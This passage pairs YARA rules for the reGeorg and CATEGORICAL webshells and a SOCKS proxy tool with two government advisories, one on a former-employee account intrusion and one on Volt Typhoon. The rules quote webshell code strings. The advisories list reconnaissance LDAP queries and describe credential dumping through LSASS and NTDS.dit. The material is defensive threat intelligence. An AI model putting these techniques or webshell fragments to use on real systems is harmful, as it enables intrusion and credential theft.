“threatintel@volexity.com”        date = “2018-08-29”        description = “Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg.”        hash = “9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988”        os = “win”        os_arch = “all”        reference = “https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.aspx”        report = “TIB-20231215”        scan_context = “file,memory”        last_modified = “2024-01-09T10:04Z”        license = “See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt”        rule_id = 410        version = 7     strings:        $a1 = “every office needs a tool like Georg” ascii        $a2 = “cmd = Request.QueryString.Get(\”cmd\”)” ascii        $a3 = “exKak.Message” ascii         $proxy1 = “if (rkey != \”Content-Length\” && rkey != \”Transfer-Encoding\”)”         $proxy_b1 = “StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\”UTF-8\”));” ascii        $proxy_b2 = “string rbody = repBody.ReadToEnd();” ascii        $proxy_b3 = “Response.AddHeader(\”Content-Length\”, rbody.Length.ToString());” ascii     condition:        any of ($a*) or        $proxy1 or        all of ($proxy_b*)} rule hacktool_py_pysoxy{    meta:        author = “threatintel@volexity.com”        date = “2024-01-09”        description = “SOCKS5 proxy tool used to relay connections.”        hash1 = “e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb”        os = “all”        os_arch = “all”        reference = “https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py”        report = “TIB-20240109”        scan_context = “file,memory”        last_modified = “2024-01-09T13:45Z”        license = “See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt”        rule_id = 10065        version = 3     strings:        $s1 = “proxy_loop” ascii        $s2 = “connect_to_dst” ascii        $s3 = “request_client” ascii        $s4 = “subnegotiation_client” ascii        $s5 = “bind_port” ascii     condition:        all of them} rule apt_webshell_py_categorical: UTA0178 {     meta:         author = “threatintel@volexity.com”         date = “2024-01-18”         description = “Detection for the CATEGORICAL webshell.”         os = “linux”         os_arch = “all”         scan_context = “file,memory”         severity = “critical”       strings:         $s1 = “exec(zlib.decompress(aes.decrypt(base64.b64decode” ascii         $s2 = “globals()[dskey].pop(‘result’,None)” ascii         $s3 = “dsid=request.cookies.get(‘DSID'” ascii       condition:         any of ($s*) }

SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment. CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts. Download the PDF version of this report: AA24-046A Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization (PDF, 499.99 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actor’s activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview A state government organization was notified that documents containing host and user information, including metadata, were posted on a dark web brokerage site. After further investigation, the victim organization determined that the documents were accessed via the compromised account of a former employee. Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[1] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee. The scope of this investigation included the victim organization’s on-premises environment, as well as their Azure environment, which hosts sensitive systems and data. Analysis determined the threat actor did not move laterally from the compromised on-premises network to the Azure environment and did not compromise sensitive systems. Untitled Goose Tool Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA’s Untitled Goose Tool—a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments. CISA developed the Untitled Goose Tool to export and review AAD sign-in and audit logs, M365 unified audit logs (UAL), Azure activity logs, and MDE data. By exporting cloud artifacts, Untitled Goose Tool supports incident response teams with environments that do not ingest logs into a security information and event management (SIEM) tool. Threat Actor Activity The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN [T1133] with the intent to blend in with legitimate traffic to evade detection. Initial Access: Compromised Domain Accounts USER1: The threat actor gained initial access through the compromised account of a former employee with administrative privileges (USER1) [T1078.002] to conduct reconnaissance and discovery activities. The victim organization confirmed that this account was not disabled immediately following the employee’s departure. The threat actor likely obtained the USER1 account credentials in a separate data breach due to the credentials appearing in publicly available channels containing leaked account information [T1589.001]. USER1 had access to two virtualized servers including SharePoint and the workstation of the former employee. The workstation was virtualized from a physical workstation using the Veeam Physical to Virtual (P2V) function within the backup software. USER2: The threat actor likely obtained the USER2 account credentials from the virtualized SharePoint server managed by USER1 [T1213.002]. The victim confirmed that the administrator credentials for USER2 were stored locally on this server [T1552.001]. Through connection from the VM, the threat actor authenticated to multiple services [T1021] via the USER1 account, as well as from an additional compromised global domain administrator account (USER2) [T1078.002]. The threat actor’s use of the USER2 account was impactful due to the access it granted to both the on-premises AD and Azure AD [T1021.007], thus enabling administrative privileges [T1078.004]. Following notification of the dark web posting, the victim organization immediately disabled the USER1 account and took the two virtualized servers associated with the former employee offline. The victim also changed the password for the USER2 account and removed administrator privileges. Neither of the administrative accounts had multifactor authentication (MFA) enabled. LDAP Queries Through connection from the VM, the threat actor conducted LDAP queries of the AD, likely using the open source tool AdFind.exe, based on the format of the output. CISA and MS-ISAC assess the threat actor executed the LDAP queries [T1087.002] to collect user, host [T1018], and trust relationship information [T1482]. It is also believed the LDAP queries generated the text files the threat actor posted for sale on the dark web brokerage site: ad_users.txt, ad_computers.txt, and trustdmp.txt. Table 1 lists all queries that were conducted between 08:39:43-08:40:56 Coordinated Universal Time (UTC). Table 1: LDAP Queries Conducted by the Threat Actor Query Description LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) Collects names and metadata of users in the domain. LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) Collects names and metadata of hosts in the domain. LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) Collects trust information in the domain. LDAP Search Scope: WholeSubtree, Base Object: DC=[REDACTED],DC=local, Search Filter: ( &  ( &  (sAMAccountType=805306368)  (servicePrincipalName=*) ( ! (sAMAccountName=krbtgt) ) ( !  (userAccountControl&2) ) )  (adminCount=1) ) Collects Domain Administrators and Service Principals in the domain. Service Authentication Through the VM connection, the threat actor was observed authenticating to various services on the victim organization’s network from the USER1 and USER2 administrative accounts. In all instances, the threat actor authenticated to the Common Internet File Service (CIFS) on various endpoints [T1078.002],[T1021.002]—a protocol used for providing shared access to files and printers between machines on the network. This was likely used for file, folder, and directory discovery [T1083], and assessed to be executed in an automated manner. USER1 authenticated to four services, presumably for the purpose of network and service discovery [T1046]. USER2 authenticated to twelve services. Note: This account had administrative privileges to both the on-premises network and Azure tenant. MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 2-9 for all referenced threat actor’s tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 2: Reconnaissance Technique Title ID Use Gather Victim Identity Information: Credentials T1589.001 The actor likely gathered USER1 account credentials in a data breach where account information appeared in publicly available channels. Table 3: Initial Access Technique Title ID Use Valid Accounts: Domain Accounts T1078.002 The actor gained initial access through the compromised account of a former employee with administrative privileges (USER1). The employee’s account was not immediately disabled after their departure. Table 4: Persistence Technique Title ID Use External Remote Services T1133 The actor connected a VM via the victim’s VPN to blend in with legitimate traffic to evade detection. Table 5: Privilege Escalation Technique Title ID Use Valid Accounts: Domain Accounts T1078.002 The actor authenticated to multiple services from a compromised Global Domain Administrator account (USER2). The actor also authenticated to the Common Internet File Service (CIFS) on various endpoints. Valid Accounts: Cloud Accounts T1078.004 The actor used a compromised account (USER2) which was synced to both the on-premises AD and Azure AD, thus enabling administrative privileges to both the on-premises network and Azure tenant. Table 6: Credential Access Technique Title ID Use Unsecured Credentials: Credentials in Files T1552.001 The actor likely obtained USER2 account credentials from the virtualized SharePoint server where they were locally stored. Table 7: Discovery Technique Title ID Use Account Discovery: Domain Account T1087.002 Through the VM connection, the actor executed LDAP queries of the AD. Remote System Discovery T1018 Through the VM connection, the actor executed LDAP queries to collect user and host information. Domain Trust Discovery T1482 Through the VM connection, the actor executed LDAP queries to collect trust relationship information. File and Directory Discovery T1083 The actor authenticated to the CIFS on various endpoints likely for the purpose of file, folder, and directory discovery. Network Service Discovery T1046 The actor used the compromised USER1 account to authenticate to four services, presumably for the purpose of network and service discovery. Table 8: Lateral Movement Technique Title ID Use Remote Services T1021 The actor connected from an unknown VM and authenticated to multiple services via the USER1 account. Remote Services: Cloud Services T1021.007 The actor used the USER2 account, which granted access to the Azure AD, as well as the on-premises AD. Remote Services: SMB/Windows Admin Shares T1021.002 The actor used compromised accounts to interact with a remote network share using Server Message Block. Table 9: Collection Technique Title ID Use Data from Information Repositories: SharePoint T1213.002 The actor likely obtained the USER2 account credentials from the virtualized SharePoint server managed by USER1. MITIGATIONS Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST), which apply to all critical infrastructure organizations and network defenders. The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Secure and Monitor Administrator Accounts The threat actor gained access to the network via compromised administrator accounts that did not have MFA enabled. The compromised USER2 Global Domain Administrator account could have enabled the threat actor to move laterally from the on-premises environment to the Azure tenant. In response to the incident, the victim organization removed administrator privileges for USER2. Additionally, the victim organization disabled unnecessary administrator accounts and enabled MFA for all administrator accounts. To prevent similar compromises, CISA and MS-ISAC recommend the following: Review current administrator accounts to determine their necessity and only maintain administrator accounts that are essential for network management. This will reduce the attack surface and focus efforts on the security and monitoring of necessary accounts. Restrict the use of multiple administrator accounts for one user. Create separate administrator accounts for on-premises and Azure environments to segment access. Implement the principle of least privilege to decrease threat actor’s ability to access key network resources. Enable just-in-time and just enough access for administrator accounts to elevate the minimum necessary privileges for a limited time to complete tasks. Use phishing-resistant multifactor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit CISA’s More than a Password webpage and read CISA’s Implementing Phishing-Resistant MFA fact sheet. Reduce Attack Surface Unnecessary accounts, software, and services in the network create additional vectors for a threat actor to compromise. CISA and MS-ISAC recommend the following: Establish policy and procedure for the prompt removal of unnecessary accounts and groups from the enterprise, especially privileged accounts. Organizations should implement a robust and continuous user management process to ensure accounts of offboarded employees are removed and can no longer access the network. Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions. Determine the need and functionality of assets that require public internet exposure [CPG 1.A]. Follow a routine patching cycle for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation. Restrict personal devices from connecting to the network. Personal devices are not subject to the same group policies and security measures as domain joined devices. Evaluate Tenant Settings By default, in Azure AD all users can register and manage all aspects of applications they create. Users can also determine and approve what organizational data and services the application can access. These default settings can enable a threat actor to access sensitive information and move laterally in the network. In addition, users who create an Azure AD automatically become the Global Administrator for that tenant. This could allow a threat actor to escalate privileges to execute malicious actions. CISA and MS-ISAC recommend the following: Evaluate current user permissions in the Azure tenant to restrict potentially harmful permissions including: Restrict users’ ability to register applications. By default, all users in Azure AD can register and manage the applications they create and approve the data and services the application can access. If this is exploited, a threat actor can access sensitive information and move laterally in the network. Restrict non-administrators from creating tenants. Any user who creates an Azure AD automatically becomes the Global Administrator for that tenant. This creates an opportunity for a threat actor to escalate privileges to the highest privileged account. Restrict access to the Azure AD portal to administrators only. Users without administrative privileges cannot change settings, however, they can view user info, group info, device details, and user privileges. This would allow a threat actor to gather valuable information for malicious activities. Create a Forensically Ready Organization Collect access- and security-focused logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and virtual private network) for use in both detection and incident response activities [CPG 2.T]. Enable complete coverage of tools, including Endpoint Detection and Response (EDR), across the environment for thorough analysis of anomalous activity and remediation of potential vulnerabilities. Assess Security Configuration of Azure Environment CISA created the Secure Cloud and Business Applications (SCuBA) assessment tool to help Federal Civilian Executive Branch (FCEB) agencies to verify that a M365 tenant configuration conforms to a minimal viable secure configuration baseline. Although the SCuBA assessment tool was developed for FCEB, other organizations can benefit from its output. CISA and MS-ISAC recommend the following: Use tools that identify attack paths. This will enable defenders to identify common attack paths used by threat actors and shut them down before they are exploited. Review the security recommendations list provided by Microsoft 365 Defender. Focus remediation on critical vulnerabilities on endpoints that are essential to mission execution and contain sensitive data. Evaluate Conditional Access Policies Conditional access policies require users who want to access a resource to complete an action. Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection. Review current conditional access policies to determine if changes are necessary. Reset All Passwords and Establish Secure Password Policies In response to the incident, the victim organization reset passwords for all users. Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as user passwords expire [CPG 2.A],[CPG 2.B],[CPG 2.C]. Store credentials in a secure manner, such as with a credential manager, vault, or other privileged account management solution [CPG 2.L]. For products that come with default passwords, ask vendors how they plan to eliminate default passwords, as highlighted in CISA’s Secure by Design Alert: How Manufacturers Can Protect Customers by Eliminating Default Passwords. Mitigations for Vendors CISA recommends that vendors incorporate secure by design principles and tactics into their practices, limiting the impact of threat actor techniques and strengthening the secure posture for their customers. Prioritize secure by default configurations, such as eliminating default passwords and providing high-quality audit logs to customers with no additional configuration, at no extra charge. Secure by default configurations should be prioritized to eliminate the need for customer implementation of hardening guidance. Immediately identify, mitigate, and update affected products that are not patched in accordance with CISA’s Known Exploited Vulnerabilities (KEV) catalog. Implement multifactor authentication (MFA), ideally phishing-resistant MFA, as a default (rather than opt-in) feature for all products. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see table 2-9). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES MS-ISAC: Center for Internet Security (CIS) Cyber-Attack Defense: CIS Benchmarks + CDM + MITRE ATT&CK REFERENCES [1] CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC. VERSION HISTORY February 15, 2024: Initial version.

SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China (PRC) state-sponsored cyber actors are seeking to pre-position themselves on IT networks for disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States. CISA, NSA, FBI and the following partners are releasing this advisory to warn critical infrastructure organizations about this assessment, which is based on observations from the U.S. authoring agencies’ incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus): U.S. Department of Energy (DOE) U.S. Environmental Protection Agency (EPA) U.S. Transportation Security Administration (TSA) Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC) Canadian Centre for Cyber Security (CCCS), a part of the Communications Security Establishment (CSE) United Kingdom National Cyber Security Centre (NCSC-UK) New Zealand National Cyber Security Centre (NCSC-NZ) The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations—primarily in Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors—in the continental and non-continental United States and its territories, including Guam. Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions. The U.S. authoring agencies are concerned about the potential for these actors to use their network access for disruptive effects in the event of potential geopolitical tensions and/or military conflicts. CCCS assesses that the direct threat to Canada’s critical infrastructure from PRC state-sponsored actors is likely lower than that to U.S. infrastructure, but should U.S. infrastructure be disrupted, Canada would likely be affected as well, due to cross-border integration. ASD’s ACSC and NCSC-NZ assess Australian and New Zealand critical infrastructure, respectively, could be vulnerable to similar activity from PRC state-sponsored actors. As the authoring agencies have previously highlighted, the use of living off the land (LOTL) techniques is a hallmark of Volt Typhoon actors’ malicious cyber activity when targeting critical infrastructure. The group also relies on valid accounts and leverage strong operational security, which combined, allows for long-term undiscovered persistence. In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years. Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim’s environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise. The authoring agencies urge critical infrastructure organizations to apply the mitigations in this advisory and to hunt for similar malicious activity using the guidance herein provided, along with the recommendations found in joint guide Identifying and Mitigating Living Off the Land Techniques. These mitigations are primarily intended for IT and OT administrators in critical infrastructure organizations. Following the mitigations for prevention of or in response to an incident will help disrupt Volt Typhoon’s accesses and reduce the threat to critical infrastructure entities. If activity is identified, the authoring agencies strongly recommend that critical infrastructure organizations apply the incident response recommendations in this advisory and report the incident to the relevant agency (see Contact Information section). For additional information, see joint advisory People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection and U.S. Department of Justice (DOJ) press release U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure. For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage. Download the PDF version of this report: AA24-038A PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure (PDF, 1.56 MB ) Read the accompanying Malware Analysis Report: MAR-10448362-1.v1 Volt Typhoon. For a downloadable copy of indicators of compromise (IOCs), see: MAR-10448362.c1.v2.CLEAR_stix2.json (JSON, 51.99 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See Appendix C: MITRE ATT&CK Tactics and Techniques section for tables of the Volt Typhoon cyber threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview of Activity In May 2023, the authoring agencies—working with industry partners—disclosed information about activity attributed to Volt Typhoon (see joint advisory People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection). Since then, CISA, NSA, and FBI have determined that this activity is part of a broader campaign in which Volt Typhoon actors have successfully infiltrated the networks of critical infrastructure organizations in the continental and non-continental United States and its territories, including Guam. The U.S. authoring agencies have primarily observed compromises linked to Volt Typhoon in Communications, Energy, Transportation Systems, and Water and Wastewater Systems sector organizations’ IT networks. Some victims are smaller organizations with limited cybersecurity capabilities that provide critical services to larger organizations or key geographic locations. Volt Typhoon actors tailor their TTPs to the victim environment; however, the U.S. authoring agencies have observed the actors typically following the same pattern of behavior across identified intrusions. Their choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable the disruption of OT functions across multiple critical infrastructure sectors (see Figure 1). Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization’s network architecture and operational protocols. This reconnaissance includes identifying network topologies, security measures, typical user behaviors, and key network and IT staff. The intelligence gathered by Volt Typhoon actors is likely leveraged to enhance their operational security. For example, in some instances, Volt Typhoon actors may have abstained from using compromised credentials outside of normal working hours to avoid triggering security alerts on abnormal account activities. Volt Typhoon typically gains initial access to the IT network by exploiting known or zero-day vulnerabilities in public-facing network appliances (e.g., routers, virtual private networks [VPNs], and firewalls) and then connects to the victim’s network via VPN for follow-on activities. Volt Typhoon aims to obtain administrator credentials within the network, often by exploiting privilege escalation vulnerabilities in the operating system or network services. In some cases, Volt Typhoon has obtained credentials insecurely stored on a public-facing network appliance. Volt Typhoon uses valid administrator credentials to move laterally to the domain controller (DC) and other devices via remote access services such as Remote Desktop Protocol (RDP). Volt Typhoon conducts discovery in the victim’s network, leveraging LOTL binaries for stealth. A key tactic includes using PowerShell to perform targeted queries on Windows event logs, focusing on specific users and periods. These queries facilitate the discreet extraction of security event logs into .dat files, allowing Volt Typhoon actors to gather critical information while minimizing detection. This strategy, blending in-depth pre-compromise reconnaissance with meticulous post-exploitation intelligence collection, underscores their sophisticated and strategic approach to cyber operations. Volt Typhoon achieves full domain compromise by extracting the Active Directory database (NTDS.dit) from the DC. Volt Typhoon frequently employs the Volume Shadow Copy Service (VSS) using command-line utilities such as vssadmin to access NTDS.dit. The NTDS.dit file is a centralized repository that contains critical Active Directory data, including user accounts, passwords (in hashed form), and other sensitive data, which can be leveraged for further exploitation. This method entails the creation of a shadow copy—a point-in-time snapshot—of the volume hosting the NTDS.dit file. By leveraging this snapshot, Volt Typhoon actors effectively bypass the file locking mechanisms inherent in a live Windows environment, which typically prevent direct access to the NTDS.dit file while the domain controller is operational. Volt Typhoon likely uses offline password cracking techniques to decipher these hashes. This process involves extracting the hashes from the NTDS.dit file and then applying various password cracking methods, such as brute force attacks, dictionary attacks, or more sophisticated techniques like rainbow tables to uncover the plaintext passwords. The successful decryption of these passwords allows Volt Typhoon actors to obtain elevated access and further infiltrate and manipulate the network. Volt Typhoon uses elevated credentials for strategic network infiltration and additional discovery, often focusing on gaining capabilities to access OT assets. Volt Typhoon actors have been observed testing access to domain-joint OT assets using default OT vendor credentials, and in certain instances, they have possessed the capability to access OT systems whose credentials were compromised via NTDS.dit theft. This access enables potential disruptions, such as manipulating heating, ventilation, and air conditioning (HVAC) systems in server rooms or disrupting critical energy and water controls, leading to significant infrastructure failures (in some cases, Volt Typhoon actors had the capability to access camera surveillance systems at critical infrastructure facilities). In one confirmed compromise, Volt Typhoon actors moved laterally to a control system and were positioned to move to a second control system. Figure 1: Typical Volt Typhoon Activity After successfully gaining access to legitimate accounts, Volt Typhoon actors exhibit minimal activity within the compromised environment (except discovery as noted above), suggesting their objective is to maintain persistence rather than immediate exploitation. This assessment is supported by observed patterns where Volt Typhoon methodically re-targets the same organizations over extended periods, often spanning several years, to continuously validate and potentially enhance their unauthorized accesses. Evidence of their meticulous approach is seen in instances where they repeatedly exfiltrate domain credentials, ensuring access to current and valid accounts. For example, in one compromise, Volt Typhoon likely extracted NTDS.dit from three domain controllers in a four-year period. In another compromise, Volt Typhoon actors extracted NTDS.dit two times from a victim in a nine-month period. Industry reporting—identifying that Volt Typhoon actors are silent on the network following credential dumping and perform discovery to learn about the environment, but do not exfiltrate data—is consistent with the U.S. authoring agencies’ observations. This indicates their aim is to achieve and maintain persistence on the network. In one confirmed compromise, an industry partner observed Volt Typhoon actors dumping credentials at regular intervals. In addition to leveraging stolen account credentials, the actors use LOTL techniques and avoid leaving malware artifacts on systems that would cause alerts. Their strong focus on stealth and operational security allows them to maintain long-term, undiscovered persistence. Further, Volt Typhoon’s operational security is enhanced by targeted log deletion to conceal their actions within the compromised environment. See the below sections for Volt Typhoon TTPs observed by the U.S. authoring agencies from multiple confirmed Volt Typhoon compromises. Observed TTPs Reconnaissance Volt Typhoon actors conduct extensive pre-compromise reconnaissance [TA0043] to learn about the target organization [T1591], its network [T1590], and its staff [T1589]. This includes web searches [T1593]—including victim-owned sites [T1594]—for victim host [T1592], identity, and network information, especially for information on key network and IT administrators. According to industry reporting, Volt Typhoon actors use FOFA[1], Shodan, and Censys for querying or searching for exposed infrastructure. In some instances, the U.S. authoring agencies have observed Volt Typhoon actors targeting the personal emails of key network and IT staff [T1589.002] post compromise. Resource Development Historically, Volt Typhoon actors use multi-hop proxies for command and control (C2) infrastructure [T1090.003]. The proxy is typically composed of virtual private servers (VPSs) [T1583.003] or small office/home office (SOHO) routers. Recently, Volt Typhoon actors used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations [T1584.005]. (See DOJ press release U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure for more information). Initial Access To obtain initial access [TA0001], Volt Typhoon actors commonly exploit vulnerabilities in networking appliances such as those from Fortinet, Ivanti Connect Secure (formerly Pulse Secure), NETGEAR, Citrix, and Cisco [T1190]. They often use publicly available exploit code for known vulnerabilities [T1588.005] but are also adept at discovering and exploiting zero-day vulnerabilities [T1587.004]. In one confirmed compromise, Volt Typhoon actors likely obtained initial access by exploiting CVE-2022-42475 in a network perimeter FortiGate 300D firewall that was not patched. There is evidence of a buffer overflow attack identified within the Secure Sockets Layer (SSL)-VPN crash logs. Once initial access is achieved, Volt Typhoon actors typically shift to establishing persistent access [TA0003]. They often use VPN sessions to securely connect to victim environments [T1133], enabling discreet follow-on intrusion activities. This tactic not only provides a stable foothold in the network but also allows them to blend in with regular traffic, significantly reducing their chances of detection. Execution Volt Typhoon actors rarely use malware for post-compromise execution. Instead, once Volt Typhoon actors gain access to target environments, they use hands-on-keyboard activity via the command-line [T1059] and other native tools and processes on systems [T1218] (often referred to as “LOLBins”), known as LOTL, to maintain and expand access to the victim networks. According to industry reporting, some “commands appear to be exploratory or experimental, as the operators [i.e., malicious actors] adjust and repeat them multiple times.”[2] For more details on LOTL activity, see the Credential Access and Discovery sections and Appendix A: Volt Typhoon LOTL Activity. Similar to LOTL, Volt Typhoon actors also use legitimate but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded [T1105] an outdated version of comsvcs.dll on the DC in a non-standard folder. comsvcs.dll is a legitimate Microsoft Dynamic Link Library (DLL) file normally found in the System32 folder. The actors used this DLL with MiniDump and the process ID of the Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory [T1003.001] and obtain credentials (LSASS process memory space contains hashes for the current user’s operating system (OS) credentials). The actors also use legitimate non-native network admin and forensic tools. For example, Volt Typhoon actors have been observed using Magnet RAM Capture (MRC) version 1.20 on domain controllers. MRC is a free imaging tool that captures the physical memory of a computer, and Volt Typhoon actors likely used it to analyze in-memory data for sensitive information (such as credentials) and in-transit data not typically accessible on disk. Volt Typhoon actors have also been observed implanting Fast Reverse Proxy (FRP) for command and control.[3] (See the Command and Control section). Persistence Volt Typhoon primarily relies on valid credentials for persistence [T1078]. Defense Evasion Volt Typhoon has strong operational security. Their actors primarily use LOTL for defense evasion [TA0005], which allows them to camouflage their malicious activity with typical system and network behavior, potentially circumventing simplistic endpoint security capabilities. For more information, see joint guide Identifying and Mitigating Living off the Land Techniques. Volt Typhoon actors also obfuscate their malware. In one confirmed compromise, Volt Typhoon obfuscated FRP client files (BrightmetricAgent.exe and SMSvcService.exe) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX) [T1027.002]. FRP client applications support encryption, compression, and easy token authentication and work across multiple protocols—including transmission control protocol (TCP), user datagram protocol (UDP), hypertext transfer protocol (HTTP), and hypertext transfer protocol secure (HTTPS). The FRP client applications use the Kuai connection protocol (KCP) for error-checked and anonymous data stream delivery over UDP, with packet-level encryption support. See Appendix C and CISA Malware Analysis Report (MAR)-10448362-1.v1 for more information. In addition to LOTL and obfuscation techniques, Volt Typhoon actors have been observed selectively clearing Windows Event Logs [T1070.001], system logs, and other technical artifacts to remove evidence [T1070.009] of their intrusion activity and masquerading file names [T1036.005]. Credential Access Volt Typhoon actors first obtain credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities [T1068] in the operating system or network services. In some cases, they have obtained credentials insecurely stored on the appliance [T1552]. In one instance, where Volt Typhoon likely exploited CVE-2022-42475 in an unpatched Fortinet device, Volt Typhoon actors compromised a domain admin account stored inappropriately on the device. Volt Typhoon 